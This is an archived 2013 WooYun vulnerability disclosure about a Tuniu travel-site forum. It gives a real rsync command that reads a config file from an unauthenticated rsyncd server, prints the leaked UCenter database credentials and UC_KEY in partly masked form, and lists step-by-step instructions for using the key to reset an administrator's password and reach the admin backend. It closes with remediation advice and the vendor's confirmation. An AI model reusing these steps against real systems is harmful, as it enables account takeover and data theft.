当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034737

漏洞标题:途牛网某服务配置失误 导致论坛敏感文件泄露(致使百万用户信息告急)

相关厂商:途牛旅游网

漏洞作者: 猪猪侠

提交时间:2013-08-19 16:08

修复时间:2013-10-03 16:09

公开时间:2013-10-03 16:09

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-19: 细节已通知厂商并且等待厂商处理中
2013-08-19: 厂商已经确认,细节仅向厂商公开
2013-08-29: 细节向核心白帽子及相关领域专家公开
2013-09-08: 细节向普通白帽子公开
2013-09-18: 细节向实习白帽子公开
2013-10-03: 细节向公众公开

简要描述:

一个小小的运维缺陷,直接造成论坛最敏感的配置文件泄露,间接威胁到用户的隐私安全。

详细说明:

#1 途牛旅游网 某服务器RSYNCD服务端配置失误,不需要认证即可读取任意文件

rsync 58.68.255.36::mnt_bbs/config/config_ucenter.php /tmp/config_ucenter.php


#2 直接读取到途牛旅游网论坛的UCENTER配置文件

<?php
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', '10.10.0.**:3306');
define('UC_DBUSER', 'RW_***');
define('UC_DBPW', 'BBS@******#');
define('UC_DBNAME', 'bbs');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`bbs`.cdb_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', "Uct3K2m7g06fW8Ifk080p9Z************keq8NdN1l73abeY8N6g4W4e64e");
define('UC_API', 'http://bbs.tuniu.com/uc_server');
define('UC_APPID', '1');
define('UC_IP', '127.0.0.1');
//define('UC_PPP', 20);


#3 通过获取到的UC_KEY,即可重置论坛任意用户的密码,并清除安全提问
~! 本地环境安装一个标准的Discuz X2论坛,然后选择站长->UCenter设置
http://127.0.0.1/admin.php?frames=yes&action=setting&operation=uc
填入获取到的信息:

tuniu_ucenter_info.jpg


记得:一定要选择接口方式,且 是否允许其他应用的会员在站点激活、是否允许直接激活 两项配置开启;
#4 设置完毕后,点工具->更新缓存 更新一下系统缓存
#5 来到用户管理界面,找到途牛旅游网的某个管理员信息
http://bbs.tuniu.com/space-uid-35064-profile.html

tuniu_user_info.jpg


#6 回到自己的本地论坛,添加一个管理员,用户名一定要和实际环境的一致

tuniu_add_user.jpg


~! 系统提示用户已经存在,是否在本地激活,选择 是

tuniu_jihuo.jpg


~! 这样管理员pandas的信息就通过UCenter的UC_KEY同步到了本地
用户 pandas(UID 35064) 添加成功
#7 查看pandas的信息,并修改他的密码,清除安全提问

tuniu_admin_info.jpg


#8 这样就能使用修改后的密码pandasISpandn,登录途牛旅游网论坛的后台了

tuniu_bbs_houtai.jpg


漏洞证明:

# 间接得到WebShell,接触到用户数据

tuniu_ifconfig.jpg


tuniu_database.jpg

修复方案:

#1 rsyncd 加入认证机制,且服务不对外网开放。
#2 运维缺陷,安全意识普及。

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-19 16:14

厂商回复:

已确认,感谢@猪猪侠

最新状态:

暂无